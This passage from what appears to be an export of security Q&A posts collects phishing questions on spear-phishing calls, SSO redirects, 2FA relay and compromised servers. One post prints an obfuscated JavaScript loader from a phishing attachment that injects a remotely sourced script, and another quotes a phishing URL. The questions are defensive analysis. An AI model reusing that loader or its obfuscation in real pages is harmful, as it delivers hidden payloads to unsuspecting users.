  &lt;p&gt;&lt;a href="https://www.linkedin.com/comm/start/accept-invitation?sharedKey=z65BZQRm&amp;amp;invitationId=6182181234249090451&amp;amp;trk=eml-first_guest_reminder_01-hero-2-accept_button&amp;amp;trkEmail=eml-first_guest_reminder_01-hero-2-accept_button-null-bsjb8a%7Fjwf76e8g%7E5g" rel="nofollow noreferrer"&gt;https://www.linkedin.com/comm/start/accept-invitation?sharedKey=z65BZQRm&amp;amp;invitationId=6182181234249090451&amp;amp;trk=eml-first_guest_reminder_01-hero-2-accept_button&amp;amp;trkEmail=eml-first_guest_reminder_01-hero-2-accept_button-null-bsjb8a%7Fjwf76e8g%7E5g&lt;/a&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Since this link does appear to be going to Linkedin (not the usual Russian proxy), how can the phisher possibly be using it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Spear Phishing attempt, how to respond?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm a software developer for a software development company responsible for multiple products, and I typically handle our IT needs as we're quite a small company. We had a suspicious incident today which looks an awful lot like spear phishing and I just wanted to know what actions we should be taking.&lt;/p&gt;
 &lt;p&gt;Today someone has called our office and claimed to be from Stanford University, stating that they wanted to invite our company to an online seminar for the benefit of students. They mentioned three staff members by name and job title (including myself), and asked to confirm our physical mailing address. When asked if they could mail us something through the post, I said yes and confirmed our address when it was read to me.&lt;/p&gt;
 &lt;p&gt;Immediately after this I received an email with no subject line from a Gmail address through my work address asking for my "direct number" and nothing else. It was also written in comic sans if that's relevant (we found it pretty funny).&lt;/p&gt;
 &lt;p&gt;He then called back and started asking one of our staff members for email addresses of the other two staff members who he mentioned by name. That staff member asked me through Slack for the addresses. By this time I had seen the email and figured it was a phishing attempt, so I told him to hang up immediately. It's been about 15 minutes and he has not called back since.&lt;/p&gt;
 &lt;p&gt;Was I wrong in my assessment that it was a phishing attempt? Are there any steps we should take to prevent a breach, beyond making it clear to all staff members to not share information that could be used to gain access to a staff members accounts? All our documents and software are internally hosted, we are currently preparing multiple patents and it would be potentially catastrophic if say our competitors got a copy of our technical design docs.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Security seals and the "perception of safety"?</t>
  </si>
  <si>
    <t>&lt;p&gt;I clearly understand that the security seals (verisign or norton secure etc.) shown on banking and other websites are generated using a script and available only after an ssl certificate is purchased and installed.&lt;/p&gt;
 &lt;p&gt;The certificate vendors say "the seal helps improve your customers' perception of safety and trust"&lt;/p&gt;
 &lt;p&gt;I just somehow can not convince myself with this idea of 'perception of safety'.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;No user is going to click the seal every time to see if it is really a seal by verisign.Most users will be unaware of this feature.&lt;/li&gt;
 &lt;li&gt;The image can easily faked for on a phishing site.&lt;/li&gt;
 &lt;li&gt;The vendors claim that it is a protection mechanism against phishing and Identity theft.&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;trust&gt;&lt;security-theater&gt;&lt;security-seal&gt;</t>
  </si>
  <si>
    <t>Receiving phishing text messages</t>
  </si>
  <si>
    <t>&lt;p&gt;I get a phishing messages on SMS every now and then. I'm not sure if it's from anyone that knows me.&lt;/p&gt;
 &lt;p&gt;What information can I get about the sender of the SMS?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;phone&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>How can an attacker redirect victims through proxy</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's say that an attacker is behind a proxy that's using NAT or PAT.&lt;/p&gt;
 &lt;p&gt;Is it possible for him to redirect victims to his machine to achieve some attacks like web phishing or opening reverse TCP connections?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;proxy&gt;</t>
  </si>
  <si>
    <t>Is single-sign-on making phishing attacks easier?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am not questioning the security of the technical implementations of SSO, but the training of users to follow a potentially insecure access pattern.&lt;/p&gt;
 &lt;h2&gt;Background&lt;/h2&gt;
 &lt;p&gt;If you for example roll out SSO (single-sign-on) provider &lt;a href="https://www.okta.com" rel="nofollow noreferrer"&gt;Okta&lt;/a&gt; in your organisation, when a user visits a service's website, the service redirects them to Okta for authentication, and after successful login Okta redirects the user back to the service again.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;User opens &lt;code&gt;example.com&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;example.com&lt;/code&gt; redirects user to &lt;code&gt;okta.com&lt;/code&gt; for authentication&lt;/li&gt;
 &lt;li&gt;User enters username, password and OTP (one-time password)&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;okta.com&lt;/code&gt; redirects user to &lt;code&gt;example.com&lt;/code&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;My concern here is that the user expects every password protected website they access within the organisation to redirect to a &lt;strong&gt;different URL&lt;/strong&gt; and ask for the credentials for a &lt;strong&gt;different service&lt;/strong&gt; (in this case Okta).&lt;/p&gt;
 &lt;p&gt;This is confusing. Confused users can be misled.&lt;/p&gt;
 &lt;h2&gt;Attack&lt;/h2&gt;
 &lt;p&gt;What if the landing page is fake?&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;User clicks a link they think is for &lt;code&gt;example.com&lt;/code&gt;, but actually lands on &lt;code&gt;example.cc-server.com&lt;/code&gt;. &lt;code&gt;example.cc-server.com&lt;/code&gt; is owned by a malicious actor, but looks exactly like &lt;code&gt;example.com&lt;/code&gt;. Or perhaps the user has been told, and believes, that &lt;code&gt;example.cc-server.com&lt;/code&gt; is a legitimate provider they have been registered to by the company, and they need to log in to activate it.&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;cc-server.com&lt;/code&gt; redirects user to &lt;code&gt;okta.cc-server.com&lt;/code&gt;, which looks exactly like &lt;code&gt;okta.com&lt;/code&gt;.&lt;/li&gt;
 &lt;li&gt;User enters username, password and OTP.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The hacker captures the credentials and uses them to log in to the user's Okta account. From there they can access the Okta dashboard and jump further to &lt;strong&gt;all services&lt;/strong&gt; linked to the SSO provider.&lt;/p&gt;
 &lt;p&gt;Am I missing something here, or is this access pattern a recipe for phishing attacks?&lt;/p&gt;
 &lt;p&gt;Would it not make more sense to require the user to always access &lt;code&gt;okta.com&lt;/code&gt; first, and then access the sites from there? That way the user is actively connecting to a site with the intention of logging in instead of responding to a prompt to enter credentials. The access pattern is always the same, there are no redirects, and users will be more likely to recognise an altered URL.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Can a device be remotely accessed without anything needed?</t>
  </si>
  <si>
    <t>&lt;p&gt;Suppose you have a target machine (desktop, smartphone, server) and that you have any needed knowledge about the target machine to perform the following task. Is it possible to infect given machine using that information, &lt;strong&gt;without needing the user to install something themselves&lt;/strong&gt; (aka social engineering/phishing/trojan)? Additionally, can the malware run/spread/start by itself or is it unfunctional if it's not manually run?&lt;/p&gt;
 &lt;p&gt;How easy is it for someone to infect my devices, how vulnerable are they? I would like to know how i can best protect my privacy.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;virus&gt;&lt;infection-vector&gt;</t>
  </si>
  <si>
    <t>Accidentally clicked a phishing link, am I at risk?</t>
  </si>
  <si>
    <t>&lt;p&gt;I clicked a link from a fake Twitch streamer and now I'm scared of being spied on. I typed my account details but didn't actually sent them because I realized it was a fake link right before clicking enter. &lt;/p&gt;
 &lt;p&gt;Am I at risk from some sort of malicious program being installed into my PC just by clicking the link? &lt;/p&gt;
 &lt;p&gt;&lt;code&gt;https://secure.runescape.com-l.cz/m=weblogin/loginform.ws769,443,127,150,5&lt;/code&gt;
 This is the link and I checked on VirusTotal and the result was that it was a phishing/malicious website.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;drive-by-download&gt;</t>
  </si>
  <si>
    <t>Are Web Views in android secure?</t>
  </si>
  <si>
    <t>&lt;p&gt;"&lt;a href="http://developer.android.com/reference/android/webkit/WebView.html"&gt;Web Views&lt;/a&gt;" are views that display some online content, usually a webpage within an android app.&lt;/p&gt;
 &lt;p&gt;Implemented "Web Views" usually don't seem to have any kind of status bar or an address bar to confirm if I'm on the right website or not. Thus making it a perfect exploit for malicious apps to serve web page that can be used for phishing, say like a fake facebook sign in page that could steal my credentials with little or no suspicion!&lt;/p&gt;
 &lt;p&gt;That being one of the issues, I'd like to have a more detailed and definitive answer.&lt;/p&gt;
 &lt;p&gt;So are Web Views secure? What risks do they contain?&lt;/p&gt;
 &lt;p&gt;Let me ask about a few points on this:-&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Does the web view pose the same security holes and flaws of the stock android browser (Because it is a derivative of it?)&lt;/li&gt;
 &lt;li&gt;A "remember password" dialog often appears for password submission forms in Web Views. Are the apps entirely isolated from this 'password store'?&lt;/li&gt;
 &lt;li&gt;Can apps possibly 'inject' some code into the Web View to track keystrokes/taps?&lt;/li&gt;
 &lt;li&gt;What other parts of the Web View does the app have access to?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I hope this question isn't too broad.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;web-browser&gt;</t>
  </si>
  <si>
    <t>Is a hardware based 2FA more resistant to phishing than SMS or TOTP?</t>
  </si>
  <si>
    <t>&lt;p&gt;As I understand, modern phishing is kind of like a man-in-the-middle attack. Let's say, for example that User u has an account in Domain d where he has an SMS based 2FA enabled. This is what the phishing mechanism is like:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Attacker presents a login page on a domain d' which looks similar to the login page of the domain d.&lt;/li&gt;
 &lt;li&gt;User u does not recognize this and he enters his credentials to this page on d'.&lt;/li&gt;
 &lt;li&gt;Attacker turns around and uses these credentials to login into Domain d.&lt;/li&gt;
 &lt;li&gt;Domain d sends u an OTP on his phone.&lt;/li&gt;
 &lt;li&gt;Attacker presents u an OTP verification page on domain d'.&lt;/li&gt;
 &lt;li&gt;User u enters this OTP on d'.&lt;/li&gt;
 &lt;li&gt;Attacker turns around and uses this OTP to authenticate himself on Domain d.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Now, if the user u had a hardware key, the last few steps would be very similar.&lt;/p&gt;
 &lt;ol start="4"&gt;
 &lt;li&gt;Domain d sends attacker a challenge.&lt;/li&gt;
 &lt;li&gt;Attacker reelays the challenge to the fake page on domain d'.&lt;/li&gt;
 &lt;li&gt;User uses his hardware key to sign the challenge.&lt;/li&gt;
 &lt;li&gt;Attacker turns around and submits the signed challenge to domain d, pretending to be u.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;So, in what way is a hardware based authentication mechanism like yubikey better than SMS based OTP, or TOTP codes?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;yubikey&gt;&lt;u2f&gt;&lt;hardware-token&gt;</t>
  </si>
  <si>
    <t>Phishing virus found on server</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently had a call from BELL concerning a virus on our Linux ( Debian ) Server. Apparently Google emailed our client about an Italian Database found on our server that was doing phishing. They asked Bell to block our IP if we couldn't find it within an hour.&lt;/p&gt;
 &lt;p&gt;The folder was called "Show" and inside it was an index.PHP and a bunch of other files. I deleted it and now it's fine.&lt;/p&gt;
 &lt;p&gt;The folder rights were root:root. I believe it was added when the site admin uploaded a file from his PC. But how would the file ownerships be root:root?&lt;/p&gt;
 &lt;p&gt;How do I prevent such problems. Is there any Linux packages that would help? &lt;/p&gt;
 &lt;p&gt;***In case its relevant the client is using phpMyFaq and the folder "Show" was inside the folder "Attachments".&lt;/p&gt;
 &lt;p&gt;P.s in my access.log I have a lot of these:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;- 69.158.XXX.XXX - - [02/May/2011:12:32:18 -0400] "\x16\x03\x01" 501 368 "-" "-"
 - 69.158.XXX.XXX - - [02/May/2011:12:32:18 -0400] "\x16\x03\x01" 501 368 "-" "-"
 - 69.158.XXX.XXX - - [02/May/2011:12:32:18 -0400] "\x16\x03\x01" 501 368 "-" "-"
 - 69.158.XXX.XXX - - [02/May/2011:12:32:18 -0400] "\x16\x03\x01" 501 368 "-" "-"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;where XXX.XXX is a real IP... &lt;/p&gt;
 &lt;p&gt;Could it be related? After Googling these codes I always get something about SSL's.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;linux&gt;&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>End user security awareness measurement</t>
  </si>
  <si>
    <t>&lt;p&gt;Apart from the conventional email phishing tests, what other security Key Performance Indicators can be used to measure end user security awareness in an Organization?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Looking at the &lt;a href="http://www.sans.org/critical-security-controls/control/9" rel="noreferrer"&gt;SANS critical security control #9&lt;/a&gt;:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;ul&gt;
  &lt;li&gt;9.4 Validate and improve awareness levels through periodic tests to see whether employees will click on a link from suspicious e-mail or
  provide sensitive information on the telephone without following
  appropriate procedures for authenticating a caller; targeted training
  should be provided to those who fall victim to the exercise.&lt;/li&gt;
  &lt;/ul&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I am trying to come with an indication that looks beyond the phishing emails or providing sensitive information over the phone. For example, how would I know people are aware of the dangers of using infected USBs in the organisation? Disabling the use of the USB prevents the security breach but does not benifit end user awareness of the issue. Users usually see it as an annoying control that stops them from performing their tasks. USB is just one example, how would I know that users are aware of the dangers of sharing their usernames? and similarly other wrong practices. getting their answers on the subject by surveys is one part, are there other indications?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;awareness&gt;&lt;end-user&gt;</t>
  </si>
  <si>
    <t>Is this "security update" from security-update@amazon.com an advanced phishing scam or a real security measure from Amazon?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just got either a helpful security update from Amazon or an advanced phishing attempt by an Amazon impersonator falsifying the email origin. The title is &lt;strong&gt;"Your Amazon password has been changed"&lt;/strong&gt;. &lt;/p&gt;
 &lt;p&gt;There seem to be mixed claims about the validity of this online. One of the articles I'll cite mentions that in his version of this email, each mention of "Amazon.com" is &lt;strong&gt;formatted as a link&lt;/strong&gt;. The article doesn't mention verifying the target of the link and unfortunately (or fortunately) my email client (Yahoo mail) seems to have removed this link from the text, perhaps to combat such phishing attempts. &lt;/p&gt;
 &lt;p&gt;I'm not worried about being in danger myself, but I thought it would be good to create this question for people searching Google about this email today to learn about the validity of it or lack thereof. &lt;/p&gt;
 &lt;p&gt;The email reads:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hello,&lt;/p&gt;
  &lt;p&gt;At Amazon we take your security and privacy very seriously. As part of
  our routine monitoring, we discovered a list of email addresses and
  passwords posted online. While the list was not Amazon-related, we
  know that many customers reuse their passwords on multiple websites.
  Since we believe your email addresses and passwords were on the list,
  we have assigned a temporary password to your Amazon.com account out
  of an abundance of caution.&lt;/p&gt;
  &lt;p&gt;You will need to reset your password when you return to the Amazon.com
  site. To reset your password, click "Your Account" at the top of any
  page on Amazon.com. On the Sign In page, click the "Forgot your
  password?" link to reach the Amazon.com Password Assistance page.
  After you enter your email or mobile phone number, you will receive an
  email containing a personalized link. Click the link from the email
  and follow the directions provided. &lt;/p&gt;
  &lt;p&gt;Your new password will be effective immediately. We recommend that you
  choose a password that you have never used with any website.&lt;/p&gt;
  &lt;p&gt;You can also enable Amazon's Two-Step Verification, a feature that
  adds an extra layer of security to your account. In addition to
  entering your password, Two-Step Verification requires you to enter a
  unique security code during sign in. To learn more about Two-Step
  Verification, go to Amazon.com Help, go to Managing Your Account, and
  click More in Managing Your Account, and then click More under Account
  Settings.&lt;/p&gt;
  &lt;p&gt;Sincerely,&lt;/p&gt;
  &lt;p&gt;Amazon.com &lt;a href="http://www.amazon.com"&gt;http://www.amazon.com&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;This e-mail was sent from an address that cannot accept incoming
  e-mail. To contact us, please visit the Help section of our website.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;A quick Google search of the first paragraph returns &lt;a href="http://www.infosecurity-magazine.com/news/amazon-implements-password-reset/"&gt;one article claiming the email is a valid security measure from Amazon&lt;/a&gt;, while &lt;a href="https://www.consumeraffairs.com/news/alleged-amazon-phishing-scam-is-scarily-sophisticated-031016.html"&gt;the other claims it to be a phishing scam&lt;/a&gt;. Which is it?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;One comment reports they contacted Amazon about the email and received this response: &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hello, &lt;/p&gt;
  &lt;p&gt;The e-mail/SMS message you received wasn't from Amazon.com. For your
  protection, do not respond to it, and do not open any attachments or
  click any links it contains. &lt;/p&gt;
  &lt;p&gt;We recommend that you send a new e-mail/SMS message and attach the
  e-mail/screenshot of the message you suspect is a fake, then send the
  e-mail to stop-spoofing@amazon.com.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;However another comment claims:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;My wife got this email also. I contacted amazon through my account and
  we were able to confirm that this was indeed really from amazon and
  that they did scramble passwords.&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;amazon&gt;</t>
  </si>
  <si>
    <t>What is the intended attack vector of this email?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received this email in my inbox:&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/2k3zX.png" alt=""&gt;&lt;/p&gt;
 &lt;p&gt;It seems innocuous enough and the source of the message tends to confirm this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;info@retinaljessicandis.info&amp;gt;
 X-Original-To: admin@quickmediasolutions.com
 Delivered-To: admin@quickmediasolutions.com
 Received: by quickmediasolutions.com (Postfix, from userid 117)
  id 1DBEB3F466; Fri, 17 Mar 2017 01:32:56 +0000 (UTC)
 X-Spam-Checker-Version: SpamAssassin 3.4.1 (2015-04-28) on
  mail.quickmediasolutions.com
 X-Spam-Level: ***
 X-Spam-Status: No, score=3.7 required=5.0 tests=BAYES_60,RCVD_IN_BRBL_LASTEXT,
  RDNS_NONE,SPF_HELO_PASS,SPF_PASS autolearn=no autolearn_force=no version=3.4.1
 Received-SPF: Pass (sender SPF authorized) identity=mailfrom; client-ip=201.197.252.218; helo=retinaljessicandis.info; envelope-from=info@retinaljessicandis.info; receiver=admin@quickmediasolutions.com 
 Received: from retinaljessicandis.info (unknown [201.197.252.218])
  by quickmediasolutions.com (Postfix) with ESMTP id 44D3B3F303
  for &amp;lt;admin@quickmediasolutions.com&amp;gt;; Fri, 17 Mar 2017 01:32:53 +0000 (UTC)
 Message-ID: &amp;lt;00848281.1BB7F609@retinaljessicandis.info&amp;gt;
 Date: Fri, 17 Mar 2017 02:32:58 +0100
 From: "Nina" &amp;lt;info@retinaljessicandis.info&amp;gt;
 X-Accept-Language: en-us
 MIME-Version: 1.0
 To: &amp;lt;admin@quickmediasolutions.com&amp;gt;
 Subject: Hi
 Content-Type: text/plain;
  charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 Good luck :)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Based on the information shown above, I have come to the following conclusions:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;The SPF test passed, confirming that the IP address my mailserver received the message from is authorized to send emails for that domain.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The message does not appear to contain any malware &amp;mdash; no JavaScript (it isn't even a multipart message) and no attachments of any sort.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The message doesn't contain any links or URLs.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Am I missing an attack vector here? Is this an attempt at phishing? If so, what is it that I am supposed to be tricked into doing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;attack-vector&gt;</t>
  </si>
  <si>
    <t>Plausible PayPal phishing... with no evidence credentials were stolen</t>
  </si>
  <si>
    <t>&lt;p&gt;Yesterday my housemate was almost scammed by someone on the internet, or so I thought. She was selling some goods on a ebay-like website, and someone contacted her to buy her stuff. She then received a false email from "Paypal" telling her she had received a certain amount of cash (which was not exactly the one she asked, thus she thought something was wrong) from that person.&lt;/p&gt;
 &lt;p&gt;By error she clicked a link in the mail, allegedly linking to a PayPal payment reference. She said nothing was prompted to her, or downloaded and she exited the opened webpage immediately.&lt;/p&gt;
 &lt;p&gt;Later that day, she realized her PayPal credentials were not valid anymore, and when she tried to change them by asking new ones, the codes she got on her phone by SMS were not working at all. She had to contact PayPal support directly for help, and now her credentials work once more. She think nothing was stolen from her account in the mean time.&lt;/p&gt;
 &lt;p&gt;Could possibly the two events be linked ? Could it be that by a simple phishing attempt an attacker managed to retrieve her credentials even though she was not prompted a false PayPal login page ? If yes, how ? &lt;/p&gt;</t>
  </si>
  <si>
    <t>Is there a way to download a PHP file without it being executed?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently got a phishing mail of unusually bad quality; "Please imediatly sign in under the following link, as we are your bank, you know"-ish. The link points to an unconvincing URL with &lt;code&gt;.php&lt;/code&gt; at the end.&lt;/p&gt;
 &lt;p&gt;I was asking myself why they might use a PHP script instead of just faking the look of the given page and submitting entered data to a form.&lt;/p&gt;
 &lt;p&gt;I don't really want to click the link to find out, but I would love to get to know what this PHP file is about to do. Is there a way of downloading the script, such as you could with the client-sided JavaScript?&lt;/p&gt;
 &lt;p&gt;Or am I not able to access the PHP file, as it is executed by the server?&lt;/p&gt;
 &lt;p&gt;Are there other ways of analyzing this file and its behavior without any danger?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;php&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Clarification on OAuth Client Secret</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a little trouble understanding, how to use OAuth to secure an API. So I developed a RESTful service, which I would like to secure to authenticated access. I first opted for HTTP Basic + TLS, but then decided to also support OAuth. The Jersey library supports OAuth1. After I got that working, the first consumer of that API will be a web application.&lt;/p&gt;
 &lt;p&gt;So I need to register a consumer, to obtain a client key, together with a client secret. I need these two to initiate the OAuth1 flow. Therefore the client (web application) need to have them. But that means every user of that webapp has now the client secret and key, and is able to impersonate me as a developer and luring user into phishing traps.This also applies, arguably to a lesser extend to other clients, which might first need to be disassembled. But the ultimate problem still exists.&lt;/p&gt;
 &lt;p&gt;But there must be a misunderstanding on my side, since such a problem would have surly been in the way of the wildly adoption of it.&lt;/p&gt;
 &lt;p&gt;One possibility that comes to my mind is, as a client developer, initiating OAuth only server-side. Is this the solution, or is there no such problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;oauth&gt;&lt;client-side&gt;</t>
  </si>
  <si>
    <t>What is this obfuscated JS code trying to do?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received phishing email that contains base64 encrypted JS code in the attachment. I decrypted it but can't understand it because of obfuscation. Do you guys have any clue what this code is trying to do?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
  eval(function($nbrut, $utnbr, $nbr, $ut, $uyn, $yun) {
  $uyn = function($charCode) {
  return ($charCode &amp;lt; $utnbr ? '' : $uyn(parseInt($charCode / $utnbr))) + (($charCode = $charCode % $utnbr) &amp;gt; 35 ? String.fromCharCode($charCode + 29) : $charCode.toString(36));
  };
  if (!''.replace(/^/, String)) {
  while ($nbr--) {
  $yun[$uyn($nbr)] = $ut[$nbr] || $uyn($nbr);
  }
  $ut = [function($encoded) {
  return $yun[$encoded]
  }];
  $uyn = function() {
  return '\\w+'
  };
  $nbr = 1;
  };
  while ($nbr--) {
  if ($ut[$nbr]) {
  $nbrut = $nbrut.replace(new RegExp('\\b' + $uyn($nbr) + '\\b', 'g'), $ut[$nbr]);
  }
  }
  return $nbrut;
  }('5 f=[&amp;quot;1G=&amp;quot;,&amp;quot;I==&amp;quot;,&amp;quot;H&amp;quot;,&amp;quot;z=&amp;quot;,&amp;quot;Z==&amp;quot;,&amp;quot;X&amp;quot;,&amp;quot;T==&amp;quot;,&amp;quot;s&amp;quot;,&amp;quot;W&amp;quot;,&amp;quot;N&amp;quot;,&amp;quot;O&amp;quot;,&amp;quot;P&amp;quot;,&amp;quot;Q=&amp;quot;,&amp;quot;R==&amp;quot;,&amp;quot;S=&amp;quot;,&amp;quot;U&amp;quot;,&amp;quot;M=&amp;quot;,&amp;quot;V=&amp;quot;,&amp;quot;Y=&amp;quot;,&amp;quot;10&amp;quot;,&amp;quot;17=&amp;quot;,&amp;quot;12==&amp;quot;,&amp;quot;13==&amp;quot;,&amp;quot;14==&amp;quot;];!7(e,x){!7(x){c(;--x;)e.15(e.K())}(L)}(f);5 3=7(x,e){5 r=f[x=+x];j 0===3.k&amp;amp;&amp;amp;(3.i=7(x){c(5 e=7(x){c(5 e,r,d=l(x).J(/=+$/,&amp;quot;&amp;quot;),n=&amp;quot;&amp;quot;,t=0,a=0;r=d.u(a++);~r&amp;amp;&amp;amp;(e=t%4?v*e+r:r,t++%4)&amp;amp;&amp;amp;(n+=l.w(y&amp;amp;e&amp;gt;&amp;gt;(-2*t&amp;amp;6))))r=&amp;quot;B+/=&amp;quot;.C(r);8 n}(x),r=[],d=0,n=e.A;d &amp;lt; n; d++) r += &amp;quot;%&amp;quot; + (&amp;quot;D&amp;quot; + e.E(d).h(16)).F(-2); 8 G(r)
  }, 3. g = {}, 3. k = !0);
  5 d = 3. g[x];
  8 j 0 === d ? (r = 3. i(r), 3. g[x] = r) : r = d, r
  }, 9 = 7() {
  5 d = !0;
  8 7(e, r) {
  5 x = d ? 7() {
  11(r) {
  5 x = r[3(&amp;quot;19&amp;quot;)](e, 1 b);
  8 r = 1 x, x
  }
  } : 7() {};
  8 d = !1, x
  }
  }(), m = 9(18, 7() {
  c(5 x = 7() {
  5 e;
  1 z {
  e = 1 A(3(&amp;quot;1B&amp;quot;) + (3(&amp;quot;1C&amp;quot;) + 3(&amp;quot;1D&amp;quot;)) + &amp;quot;);&amp;quot;)()
  }
  1 E(x) {
  e = 1 F
  }
  8 e
  }(), e = x[3(&amp;quot;o&amp;quot;)] = x[3(&amp;quot;o&amp;quot;)] || {}, r = [3(&amp;quot;1J&amp;quot;), 3(&amp;quot;1H&amp;quot;), 3(&amp;quot;1K&amp;quot;), &amp;quot;1I&amp;quot;, &amp;quot;1w&amp;quot;, 3(&amp;quot;1v&amp;quot;), &amp;quot;1k&amp;quot;], d = 0; d &amp;lt; r[3(&amp;quot;1t&amp;quot;)]; d++) {
  5 n = 9[3(&amp;quot;1u&amp;quot;)][3(&amp;quot;1c&amp;quot;)] .1 d(9), t = r[d], a = e[t] || n;
  n[3(&amp;quot;1e&amp;quot;)] = 9[3(&amp;quot;q&amp;quot;)](9), n[3(&amp;quot;1f&amp;quot;)] = a.h[3(&amp;quot;q&amp;quot;)](a), e[t] = n
  }
  });
  m();
  5 1 g = &amp;quot;&amp;quot;, b = p[3(&amp;quot;1h&amp;quot;)](3(&amp;quot;1i&amp;quot;));
  b[3(&amp;quot;1a&amp;quot;)] = 3(&amp;quot;1j&amp;quot;), b[3(&amp;quot;1l&amp;quot;)] = 3(&amp;quot;1m&amp;quot;) + &amp;quot;1n.1o/1p&amp;quot; + 3(&amp;quot;1q&amp;quot;), p[3(&amp;quot;1r&amp;quot;)](&amp;quot;1s&amp;quot;)[0][3(&amp;quot;1y&amp;quot;)](b);
  ',62,109,' || | _0x2e1d ||
  var || function |
  return |_0x237cb5 | _ | script34ssd |
  for || | _0x10e7 | qQsyqN | toString | ZNmmFr | void | AbRSQZ | String | _0x51b37a || 0x0 | document | 0x6 || Dgv4Dc9QyxzHC2nYAxb0 || charAt | 64 | fromCharCode || 255 | yxbWzw5Kq2HPBgq | length | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | indexOf | 00 | charCodeAt | slice | decodeURIComponent | ChjVDg90ExbL | D2fYBG | replace | shift | 359 | DgfIBgu | Bg9N | E30Uy29UC3rYDwn0B3iOiNjLDhvY | BgvUz3rO | zJa3mZq1mZe5mZeUANm | CMv0DxjUicHMDw5JDgLVBIGPia | BIb0AgLZiIKOicK | DhLWzq | C3jJ | y29UC3rYDwn0B3i | x19WCM90B19F | Ahr0Chm6lY90AxrRBY53yw5Jzg5H | yxbWBhK | yMLUza | C2nYAxb0 |
  if | Aw5MBW | y29UC29Szq | y3jLyxrLrwXLBwvUDa | push || z2v0rwXLBwvUDhncEvrHz05HBwu | this | 0x14 | 0x8 | arguments | 0x4 | bind | 0xa | 0x2 | emfromgetnbrtoo | 0x1 | 0x15 | 0x9 | trace | 0x11 | 0x7 | pp | page | 60 d36be72458a | 0xe | 0x16 | head | 0xd | 0x13 | 0x12 | exception | null | 0x5 |
  try | Function | 0xf | 0xc | 0x10 |
  catch | window | Dg9tDhjPBMC | 0x3 | error | 0xb | 0x17 '.split(' | '),0,{}))
 &amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Anders</t>
  </si>
  <si>
    <t>How do I run a security check on my WordPress server?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a cloud-based server running with CentOS 6.0 and CSF installed. Today I got a message from my host that one of my WordPress installations is hacked and used for phishing. &lt;/p&gt;
